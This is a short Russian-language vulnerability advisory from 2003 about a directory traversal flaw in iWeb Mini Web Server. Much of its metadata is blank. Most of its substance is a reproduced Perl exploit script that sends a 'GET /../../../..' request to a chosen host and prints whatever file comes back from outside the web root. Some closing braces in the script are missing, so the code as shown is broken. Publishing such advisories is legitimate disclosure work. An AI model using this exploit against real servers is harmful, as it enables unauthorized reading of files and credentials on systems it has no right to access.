Доступ к произвольным файлам в iWeb Server

Дата публикации:
21.04.2003
Всего просмотров:
1238
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности ввода обнаружена в iWeb Server. Удаленный пользователь может получить файлы на системе, расположенные вне Web директории.

Сообщается, что Web сервер не в состоянии отфильтровать символы обхода каталога (типа '../'). В результате удаленный пользователь может представить специально обработанный запрос, который позволить загрузить произвольные файлы не www root директории с привилегиями процесса web сервера. Эксплоит:

#!/usr/bin/perl -w
 
# S e c u r i t y F r e a k s
#   www.securityfreaks.com
 
# iWeb Mini Web Server Remote Directory Traversal
 
# subversive[at]linuxmail.org - *15/04/2003*


use IO::Socket;

if(!$ARGV[0]) {
print <<"IWEBSUK";

   S e c u r i t y F r e a k s
     www.securityfreaks.com

  -------------------------------------------------------------
  SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
  -------------------------------------------------------------
  Usage: $0 <host> <file> <port>


IWEBSUK
exit;
 

else{
$host = $ARGV[0];
} 

if(!$ARGV[2]) {
$port = "80";
 

else {
$port = $ARGV[2];
 


my $sock = new IO::Socket::INET ( Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;

Уязвимость обнаружена в iWeb Server prior to the 15th April 2003 at 00:00 GMT/UTC

Ссылки: iWeb Mini Web Server Remote Directory Traversal
или введите имя

CAPTCHA